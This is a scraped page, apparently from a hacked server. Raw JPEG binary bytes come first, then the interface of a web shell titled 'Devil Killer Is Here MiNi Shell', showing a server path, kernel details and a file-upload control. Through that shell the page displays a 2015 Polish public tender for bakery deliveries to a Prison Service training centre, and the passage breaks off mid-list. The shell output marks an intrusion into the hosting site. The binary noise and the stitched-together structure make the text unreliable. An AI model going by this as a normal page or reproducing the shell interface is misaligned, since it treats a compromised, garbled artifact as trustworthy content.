JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150421/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150421/55761-N-2015.html

<p class="kh_header"><b>Popów: Dostawy ciast i pieczywa dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie.</b><br>
<b>Numer ogłoszenia: 55761 - 2015; data zamieszczenia: 21.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy ciast i pieczywa dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy na potrzeby Ośrodka Szkolenia Służby Więziennej w Kulach oraz Oddziału Zamiejscowego w Sulejowie, ciast i pieczywa. 1. 1. Przedmiotem zamówienia na zadanie nr 1 są dostawy ciast i pieczywa dla OSSW w Kulach:L.P	Nazwa artykułu	J. m.	Ilość 
1.	Babka piaskowa o różnych smakach 	
	kg	100
2.	Ciasto drożdżowe z kruszonką
kg	100
3.	Jabłecznik
kg	150
4.	Keksik owocowy
kg	150
5	Ptasie mleczko
kg	150
6	Rogaliki z nadzieniem 
kg	100
7	Rolada makowa
kg	50
8	Rolada z bitą śmietaną
kg	100
9	Sernik wiedeński
kg	250
10	Babeczki kruche
kg	80
11	Pączki
kg	100
12	Seromakowiec
kg	100
13	Seromurzynek        
kg	100
14	Ciasto jogurtowe  
kg	100
15	Makowiec glazurowany
kg	50
16	Rolada z jabłkami
kg	100
17	Babka marmurkowa
kg	100
18	Ciasteczka francuskie
kg	100
19	Ciasto ponczowe
kg	150
20	Ciasto capucinno
kg	150
21	Orzechowiec
kg	100
22	Ciasto rafaello
kg	150
23	Cynamonowiec
kg	100
24	Ciasto bakaliowe z kokosem
kg	150
25	Babka czekoladowo - kokosowa
kg	80
26	Ciasteczka kg	80
27	Ciasto kawowe
kg	150
28	Ciasto  Bajadera
kg	150
29	Ciasto kruche z owocami
kg	100
30	Ciasto Biedronka
kg	150
31	Szarlotka miodowa
kg	100
32	Piernik
kg	100
33	Chleb baltonowski 	
kg	3 500
34	Chleb firmowy ze słonecznikiem
kg	1 000
35	Bułka- baton 	  
kg	20
36	Buła słodka
szt.	3 000
37	Bułka pszenna zwykła 	   	szt.	16 000
38	Bułka do hot-dogów 		szt.	1 000
39	Rogale szt.	3 000
Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 6 do SIWZ. 
2. Przedmiotem zamówienia na zadanie nr 2 są dostawy ciast i pieczywa dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie L.P	Nazwa artykułu	J. m.	Ilość.
1	Chleb pszenno-żytni duży	kg	2420
2	Chleb żytni pełnoziarnisty	kg	600
3	Chleb słonecznikowy		kg	585
4	Chleb razowy		kg	600
5	Kanapka angielka		kg	30
6	Bułka pszenna zwykła		kg	700
7	Bułka włoska		kg	200
8	Bułka graham		kg	200
9	Bułka kajzerka	kg	500
10	Bułka tarta		kg	100
11	Pączek drożdżowy		kg	150
12	Drożdżówka z nadzieniem	kg	350
13	Jagodnik		kg	80
14	Rurka z kremem		kg	40
15	Sernik		kg	60
16	Placek drożdżowy		kg	60
17	Babka piaskowa marmurkowa		kg	40
18	Wuzetka		kg	60
19	Ciasto miodowe		kg	30
20	Ciasto sezamowe		kg	20
21	Ciastko francuskie		kg	40
22	Mini ptyś		kg	20
23	Gniazdo poznańskie		kg	40
24	Mini pizza	kg	150
Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 6 a do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający nie przewiduje zamówień uzupełniających.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.22.00-5, 15.81.11.00-7, 15.81.14.00-0, 15.81.12.00-8, 15.80.00.00-6, 15.81.20.00-3, 15.81.21.00-4, 15.81.21.21-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1 oraz na podstawie wykazu wykonanych dostaw.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na postawie oświadczenia wynikającego z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 1 do SIWZ
Wypełniony i podpisany formularz cenowy z w zakresie zadań od 1 do 2 stanowiący załącznik do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Najkrótszy czas realizacji wymiany wadliwego towaru - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego Ośrodek Szkolenia Służby Więziennej w Kulach Kule 2, 42-110 Popów Pokój nr 3 - sekretariat. Pawilon Warta - Dział Kwatermistrzowski pok. nr 2 i 3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2015 godzina 10:00, miejsce: Oferty należy składać do dnia 2015-04-29  do godz 10:00 w siedzibie zamawiającego
Ośrodek Szkolenia Służby Więziennej w Kulach Kule 2 
42-110 Popów
Pokój nr 3 sekretariat pawilon Liswarta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy ciast i pieczywa dla OSSW  w Kulach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P	Nazwa artykułu	Kod CPV /
Polska Norma	Opis przedmiotu zamówienia	j.m.	Ilość
1.	Babka piaskowa o różnych smakach 	15812200-5 
PN-A-88106	Wyrób z ciasta biszkoptowo - tłuszczowego z dodatkiem kakao lub o innych smakach np. cytrynowym, lub pomarańczowym. Kształt prostokątny o dł. 35 cm,szer.12cm,nadany formą. Posypany cukrem pudrem lub polewą kakaową. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.	kg	100
2.	Ciasto drożdżowe z kruszonką
	15812200-5
PN-A-88106	Wyrób otrzymany z ciasta drożdżowego . Wykończony kruszonką i cukrem pudrem. Wypiekane na blachach . Kształt nadany formą, w której jest wypiekany, spulchniony drożdżami. Barwa skórki złocista do jasnobrązowej, górna powierzchnia  posypana cukrem pudrem. Smak i zapach właściwy dla użytych surowców i aromatów. Niedopuszczalny stęchły lub inny obcy smak. Ciasto bez śladów przypaleń. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się.	kg	100
3.	Jabłecznik
	15812200-5
PN-A-88106	Wyrób otrzymany z połączenia korpusu z ciasta kruchego o gr  około 1,5 cm, masy jabłkowej o grubości 3 cm, ciasta biszkoptowo-tłuszczowego o grubości 2 cm. Wykończony cukrem pudrem. Wypiekany na blachach o wielkości 40-60 cm. Kształt nadany formą. Barwa złocista do jasnobrązowej. Nadzienie ściśle przylegające do korpusu i górnej warstwy. Niedopuszczalne zagniecenia i uszkodzenia oraz stęchły lub obcy smak .Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się.	kg	150
4.	Keksik owocowy
	15812200-5
PN-A-88106	Wyrób na bazie koncentratu ciasta biszkoptowo- tłuszczowego wytwarzanego z napowietrzonej masy jaj, cukru, mąki i innych surowców z dodatkiem owoców z syropu, rodzynek, orzechów i migdałów. Prostokąt o wymiarach 35 x 12 x 7 cm, kształt nadany formą. Powierzchnie gładkie z charakterystycznym pęknięciem podłużnym. Wykończony pomadą lukrową białą lub czekoladową, posypaną posypką orzechową. Barwa złocista do jasnobrązowej. Smak i zapach słodki, wyczuwalne i widoczne użyte dodatki. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.	kg	150
5	Ptasie mleczko
	15812200-5
PN-A-88106	Wyrób z ciasta biszkoptowego, wypiekany na blachach o wielkości 40-60 cm . Otrzymany przez przełożenie biszkoptu kremem otrzymanym z napowietrzonej śmietanki kremowej z cukrem pudrem i galaretką owocową. Górna warstwa wykończona galaretką owocową i owocami . Barwa biszkoptu złocista do jasnobrązowej. Powierzchnia sucha bez przypaleń i zagnieceń.. Galaretka o strukturze jednorodnej. Masa kremowa delikatna, puszysta, ściśle przylegająca do biszkoptu. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.	kg	150
6	Rogaliki z nadzieniem 
	15812200-5 
PN-A-88106	Wyrób otrzymany z ciasta drożdżowego w kształcie malutkich rogalików nadziewany kremem budyniowym o smaku waniliowym lub  marmoladą. Waga  jednostkowa 30g- 60g Każdorazowa dostawa  powinna zawierać rogaliki jednakowej wielkości. Barwa skórki złocista do jasnobrązowej wykończona cukrem pudrem.  Niedopuszczalny smak stęchły lub inny obcy.	kg	100
7	Rolada makowa
	15812200-5
PN-A-88106	Wyrób otrzymany przez połączenie blatu biszkoptowego z masą makową w kształcie rulonu. Wykończony polewą kakaową. Długość 60 cm. Udekorowany posypką orzechową. Waga  1 szt nie mniej niż 1,80. Barwa biszkoptu złocista do jasnobrązowej. Zwoje ciasta biszkoptowego o drobnej i równomiernej porowatości ściśle przylegające do masy makowej. Grubość zwoju makowego grubości około 1,5 cm. Smak słodki, właściwy dla zastosowanych dodatków. Mak bez zanieczyszczeń ( piasek) i smaku stęchlizny. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone,twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.	kg	50
8	Rolada z bitą śmietaną
	15812200-5
PN-A-88106	Wyrób otrzymany przez połączenie blatu biszkoptowego z masą kremową otrzymaną z napowietrzonej śmietanki świeżej  o zawartości 30%  tłuszczu i paskiem galaretki owocowej.  Grubość zwoju śmietanowego nie mniejsza niż 1, 5 cm. Wykończone polewą kakaową  posypaną kokosem lub cukrem pudrem. Długość 60 cm, waga 1,80kg. Barwa biszkoptu złocista do jasnobrązowej. Zwoje ciasta biszkoptowego o drobnej i równomiernej porowatości. Ściśle połączone z nadzieniem z bitej śmietany. Smak i zapach właściwy dla ciasta biszkoptowego, użytej słodkiej śmietanki. Niedopuszczalny smak stęchły lub inny obcy.	kg	100
9	Sernik wiedeński
	15812200-5
PN-A-88106	Wyrób z ciasta kruchego, wypiekany na blachach o wielkości 40-60 cm, wysokość masy serowej 5 cm z dodatkiem kawałków brzoskwiń lub rodzynek, korpusy z ciasta kruchego do grubości 1 cm, wykończone polewą kakaową, udekorowany pomadą białą lub czekoladową. Waga ciasta 8 kg. Barwa masy serowej kremowej do jasnozłotej, jednorodna struktura masy bez oznak kruszenia, puszysta. Korpusy kruche, jasnokremowe do żółtej. Smak i zapach swoisty charakterystyczny dla użytych dodatków. Niedopuszczalny stęchły lub inny obcy. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone,twarde, rozpadające się.	kg	250
10	Babeczki kruche
	15812200-5 
PN-A-88106
	Wyrób otrzymany z ciasta kruchego niesłodzonego, którym wylepione są foremki w kształcie babeczki z wgłębieniem równej pojemności wybitego jajka kurzego. Barwa złocista do jasnobrązowej. Wyrób charakteryzujący się dużą kruchością. Smak i zapach właściwy dla użytych surowców i dodatków .Niedopuszczalny smak stęchły lub inny obcy.	kg	80
11	Pączki
	15812200-5
PN-A-88106	Wyrób otrzymany z ciasta drożdżowego. Nadziewany przetworami owocowymi, lub śmietaną wykończone glazurą, lub cukrem pudrem. Smażone na tłuszczu. Kształt okrągły, masa  70-100g. Smak i zapach typowy dla drożdżowych wyrobów smażonych. Barwa skórki złocista do jasnobrązowej. Bez oznak zakalca. Niedopuszczalny smak stęchły lub inny obcy.	kg	100
12	Seromakowiec
	15812200-5
PN-A-88106	Korpusy z ciasta kruchego o grubości 1 cm przełożony masą makową gr 3 cm i masą serową gr. 3 cm. Masy przylegają ściśle do siebie. Wypiekane na blachach o wielkości 40 x 60 cm. Wykończony glazurą białą lub czekoladową posypany wiórkami kokosowymi, orzechami i migdałami  itp.  Korpusy kruche, plastyczne, jasnokremowe do żółtej, smak i zapach charakterystyczny dla użytych dodatków, bez oznak zakalca. Barwa masy serowej kremowa do jasnozłotej. Smak słodkawo -kwaśny charakterystyczny dla zastosowanych składników. Masa makowa zwarta drobnoziarnista. Masy ściśle przylegające do siebie nie wykazujące oznak kruszenia. Mak bez zanieczyszczeń. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. ( piasek) i smaku stęchlizny. Niedopuszczalny smak stęchły lub inny obcy.	kg	100
13	Seromurzynek        
	1 5812200-5  
 PN-A-88106
	Ciasto piernikowe o gr. 2 cm, dł. 60 cm, układane na blachach w odległości 2 cm uzupełnione masą serową na przemian. Tworzy na przekroju charakterystyczną szachownicę. Wykończony białą polewą. Waga 7 kg. Barwa ciasta piernikowego brązowa do ciemnobrązowej. Barwa masy serowej kremowa do jasnozłotej.  Niedopuszczalny smak stęchły lub inny obcy. 	kg	100
14	Ciasto jogurtowe  
	15812200-5   
  PN-A-88106	Ciasto na bazie koncentratu ciasta jogurtowego jasnego i ciemnego z dodatkiem  kakao. Kształt prostokątny o wym. 40 x 60 cm, nadane formą w której było wypiekane. Na całej powierzchni ułożone owoce sezonowe i szprycowane charakterystycznym paskiem kremem budyniowym. Smak i zapach właściwy do użytych składników. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,  przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.	kg	100
15	Makowiec glazurowany
	15812200-5
PN-A-88106	Wyrób otrzymany przez połączenie korpusu z ciasta kruchego o gr. 2 cm. Oraz masy makowej z dodatkim bakalii  o gr. 5 cm. Wykończony paskami z ciasta kruchego i kruszonką. Wypiekane na blachach o wielkości 40 - 60 cm. Waga 8 kg.  Korpusy kruche, barwa jasnokremowa do żółtej, smak i zapach swoisty, bez oznak kruszenia i rozsypywania. Dobra krajalność. Mak bez zanieczyszczeń ( piasek) i smaku stęchlizny. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane. Niedopuszczalny smak stęchły lub inny obcy.   przypalone, twarde, rozpadające się.	kg	50
16	Rolada z jabłkami
	15812200-5
PN-A-88106	Wyrób otrzymany przez połączenie blatu biszkoptowego z masą jabłkową otrzymaną z prażonych jabłek i galaretki owocowej.  Grubość zwoju jabłkowego   nie mniejsza niż 1,5 cm. Wykończone polewą kakaową lub cukrem pudrem. Długość  około 60 cm, waga około 1,80kg.  Barwa biszkoptu złocista do jasnobrązowej. Zwoje ciasta biszkoptowego o drobnej i równomiernej porowatości. Ściśle połączone z nadzieniem jabłkowym.  Smak i zapach właściwy dla ciasta biszkoptowego i użytych surowców. Niedopuszczalny smak stęchły lub inny obcy.	kg	100
17	Babka marmurkowa
	15812200-5
PN-A-88106	Wyrób na bazie  ciasta biszkoptowo- tłuszczowego Kształt prostokątny o dł. 35 x 12 cm. Nadany formą w której został wypieczony. Na powierzchni górnej charakterystyczne pęknięcie. Część powierzchni babki może mieć powierzchnie brązową. Waga 900g. Posypana cukrem pudrem. Smak i zapach właściwy dla użytych składników lekko słodki wyczuwalny dodatek kakao niedopuszczalny stęchły lub inny obcy. Barwa jasnożółta z brązową. Nie dopuszczalne grudki surowców, zakalec, przypalenia , połamania. Niedopuszczalny smak stęchły lub inny obcy.	kg	100
18	Ciasteczka francuskie
	15812200-5
PN-A-88106	Wyrób z ciasta francuskiego . Kształt ciastek w formie koperty z nadzieniem sera z dodatkiem budyniu. Ciastka posypane cukrem pudrem. Niedopuszczalny smak stęchły lub inny obcy.
	kg	100
19	Ciasto ponczowe
	15812200-5
